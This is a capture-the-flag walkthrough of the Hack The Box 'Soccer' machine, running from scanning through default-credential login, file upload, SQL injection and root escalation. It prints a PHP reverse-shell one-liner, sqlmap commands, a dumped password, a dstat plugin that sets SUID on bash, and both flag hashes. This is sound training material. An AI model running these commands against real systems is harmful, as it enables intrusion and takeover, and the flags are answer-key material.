Soccer
Easy Linux HTB box Machine
Reconnaissance
As always we start off with a port scan using Nmap
nmap -p- --open -Pn -n --min-rate 5000 -sS -sCV -oN scan 10.10.11.194# Nmap 7.95 scan initiated Mon Jul 28 12:12:35 2025 as: /usr/lib/nmap/nmap --privileged -p- --open -Pn -n --min-rate 5000 -sS -sCV -oN scan 10.10.11.194
Nmap scan report for 10.10.11.194
Host is up (0.043s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ad:0d:84:a3:fd:cc:98:a4:78:fe:f9:49:15:da:e1:6d (RSA)
| 256 df:d6:a3:9f:68:26:9d:fc:7c:6a:0c:29:e9:61:f0:0c (ECDSA)
|_ 256 57:97:56:5d:ef:79:3c:2f:cb:db:35:ff:f1:7c:61:5c (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://soccer.htb/
9091/tcp open xmltec-xmlmail?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, RPCCheck, SSLSessionReq, drda, informix:
| HTTP/1.1 400 Bad Request
| Connection: close
| GetRequest:
| HTTP/1.1 404 Not Found
| Content-Security-Policy: default-src 'none'
| X-Content-Type-Options: nosniff
| Content-Type: text/html; charset=utf-8
| Content-Length: 139
-- SNIP --
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 28 12:13:03 2025 -- 1 IP address (1 host up) scanned in 27.73 secondsWe see that TCP Port 22 (SSH) | TCP Port 80 (HTTP) are open, we can also notice that this server is using Virtual Hosting to soccer.htb so we add it to our /etc/hosts file
We also check something interesting: The TCP Port 9091 (?) is open which is curious, it gives us a hint for later on exploitation.
Let's start off by enumerating the Web Server using WhatWeb where we will try to enumerate the services and potential attack vectors for later:
whatweb http://soccer.htb
http://soccer.htb [200 OK] Bootstrap[4.1.1], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], IP[10.10.11.194], JQuery[3.2.1,3.6.0], Script, Title[Soccer - Index], X-UA-Compatible[IE=edge], nginx[1.18.0]We proceed to manually check the webpage with our browser
As we don't seem to find anything useful here, let's perform a directory brute-forcing using GoBuster
gobuster dir -u http://soccer.htb -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -t 200
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://soccer.htb
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htm (Status: 403) [Size: 162]
/.html (Status: 403) [Size: 162]
/. (Status: 200) [Size: 6917]
/.htaccess (Status: 403) [Size: 162]
/.htc (Status: 403) [Size: 162]
/.html_var_DE (Status: 403) [Size: 162]
/.htpasswd (Status: 403) [Size: 162]
/.html. (Status: 403) [Size: 162]
/.html.html (Status: 403) [Size: 162]
/.htpasswds (Status: 403) [Size: 162]
/.htm. (Status: 403) [Size: 162]
/.htmll (Status: 403) [Size: 162]
/.html.old (Status: 403) [Size: 162]
/tiny (Status: 301) [Size: 178] [--> http://soccer.htb/tiny/]
-------- SNIP ---------
Progress: 20598 / 63089 (32.65%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 22403 / 63089 (35.51%)We found a interesting soccer.htb/tiny directory so let's check that out!
We try with the default H3K Tiny File Manager credentials: admin:admin@123 and success! we logon onto the admin dashboard panel
And we also find that the /var/www/html/tiny/uploads directory is writeable and we we can upload files there! so we upload a Reverse Shell on our shell.php file
Exploitation
php -r '$sock=fsockopen("IP",PORT);exec("/bin/bash <&3 >&3 2>&3");'We set up our listener with netcat... And we got our reverse shell as www-data done!
nc -lvnp 1336
Listening on 0.0.0.0 1336
Connection received on 10.10.11.194 51998
Linux soccer 5.4.0-135-generic #152-Ubuntu SMP Wed Nov 23 20:19:22 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
14:14:06 up 52 min, 1 user, load average: 0.06, 0.02, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (1042): Inappropriate ioctl for device
bash: no job control in this shell
www-data@soccer:/$ After further enumeration we don't seem to find any PrivEsc vectors, but we find a interesting file
www-data@soccer:/etc/nginx/sites-enabled$ ls
ls
default
soc-player.htb
www-data@soccer:/etc/nginx/sites-enabled$ As we see, there's another site enabled for this web server below the name of soc-player.soccer.htb so we add into our /etc/hosts file as we did earlier and proceed to check whats in there
Seems familiar right? It's almost the same as the soccer.htb dashboard but with some noticeable differences: the Match, Tickets and Logout panels, after enumerating everything and signing up, we realize the server gives us a ticket on the Tickets section
Let's check how this works with BurpSuite
We can see that when we put the correct code it sends "Ticket Exists" to soc-player.soccer.htb:9091
However if we try to perform a basic SQLi using the payload:
{"id":"666 OR 1=1"}
Ticket ExistsLet's try to perform a SQLi attack with SQLMap
sqlmap -u "ws://soc-player.soccer.htb:9091" --data '{"id": "*"}' --dbs --threads 10 --level 5 --risk 3 --batch
___
__H__
___ ___[)]_____ ___ ___ {1.9.6#stable}
|_ -| . ["] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:35:13 /2025-07-28/
----------- SNIP -------------
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] soccer_db
[*] sys
[15:35:33] [INFO] fetched data logged to text files under '/home/delorian/.local/share/sqlmap/output/soc-player.soccer.htb'
[*] ending @ 15:35:33 /2025-07-28/We see that we can enumerate some databases, but we're interested on the soccer_db one so let's try and check what's inside
Database: soccer_db
Table: accounts
[1 entry]
+------+-------------------+----------------------+----------+
| id | email | password | username |
+------+-------------------+----------------------+----------+
| 1324 | player@player.htb | PlayerOftheMatch2022 | player |
+------+-------------------+----------------------+----------+And we found the password for the username player !! Let's try and login using SSH
ssh player@soccer.htb
player@soccer.htb's password: PlayerOftheMatch2022
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-135-generic x86_64)Privilege Escalation
As we successfully logon with the user player, let's try and find a way to escalate our privileges to root
player@soccer:~$ id
uid=1001(player) gid=1001(player) groups=1001(player)
player@soccer:~$ sudo -l
[sudo] password for player:
Sorry, user player may not run sudo on localhost.
player@soccer:~$ find / -perm -4000 -ls 2>/dev/null
70968 44 -rwsr-xr-x 1 root root 42224 Nov 17 2022 /usr/local/bin/doas
18263 140 -rwsr-xr-x 1 root root 142792 Nov 28 2022 /usr/lib/snapd/snap-confine
7696 52 -rwsr-xr-- 1 root messagebus 51344 Oct 25 2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
14300 464 -rwsr-xr-x 1 root root 473576 Mar 30 2022 /usr/lib/openssh/ssh-keysign
16207 24 -rwsr-xr-x 1 root root 22840 Feb 21 2022 /usr/lib/policykit-1/polkit-agent-helper-1
7700 16 -rwsr-xr-x 1 root root 14488 Jul 8 2019 /usr/lib/eject/dmcrypt-get-device
1753 40 -rwsr-xr-x 1 root root 39144 Feb 7 2022 /usr/bin/umount
2093 40 -rwsr-xr-x 1 root root 39144 Mar 7 2020 /usr/bin/fusermount
1752 56 -rwsr-xr-x 1 root root 55528 Feb 7 2022 /usr/bin/mount
------------ SNIP --------------
1166 39 -rwsr-xr-x 1 root root 39144 Feb 7 2022 /snap/core20/1695/usr/bin/umount
1255 51 -rwsr-xr-- 1 root systemd-resolve 51344 Oct 25 2022 /snap/core20/1695/usr/lib/dbus-1.0/dbus-daemon-launch-helper
1627 463 -rwsr-xr-x 1 root root 473576 Mar 30 2022 /snap/core20/1695/usr/lib/openssh/ssh-keysign
player@soccer:~$ We found a weird binary with SUID 0: /usr/local/bin/doas so let's check it using man doas
• The config file /usr/local/etc/doas.conf could not be parsed.
• The user attempted to run a command which is not permitted.
• The password was incorrect.
• The specified command was not found or is not executable.
SEE ALSO
su(1), doas.conf(5)We can see it points to the /usr/local/etc/doas.conf as the configuration file so let's check that also
player@soccer:/usr/local/etc$ cat doas.conf
permit nopass player as root cmd /usr/bin/dstat
player@soccer:/usr/local/etc$As we can see this file also points out to another file, in this case /usr/bin/dstat lo let's do man dstat
FILES Paths that may contain external dstat_*.py plugins:
----- SNIP -----
PLUGINS
While anyone can create their own dstat plugins (and contribute them) dstat ships with a number of plugins already that extend its capabilities greatly. Here is an overview of the plugins dstat ships with:
----- SNIP -----
~/.dstat/
(path of binary)/plugins/
/usr/share/dstat/
/usr/local/share/dstat/
------ SNIP -----
We can see we can create our own plugins in order to escalate our privileges, so let's write a malicious Python plugin on /usr/local/share/dstat
echo 'import os; os.system("chmod u+s /bin/bash")' > /usr/local/share/dstat/dstat_pwn.py
-------- EXECUTE THE PAYLOAD WITH doas ----------
player@soccer:/usr/local/share/dstat$ doas /usr/bin/dstat --root
/usr/bin/dstat:2619: DeprecationWarning: the imp module is deprecated in favour of importlib; see the module's documentation for alternative uses
import imp
Module dstat_root failed to load. (name 'dstat_plugin' is not defined)
None of the stats you selected are available.
player@soccer:/usr/local/share/dstat$ bash -p
bash-5.0
whoami
root
------ RETRIEVE BOTH FLAGS!!! ------------
bash-5.0
cat /root/root.txt
bfef435d28f941a5913079bfd6a7ea7a
bash-5.0
cat /home/player/user.txt
4073453b05e9902332f3820e814ddbc7Hope you liked this write-up and see you next time!
Last updated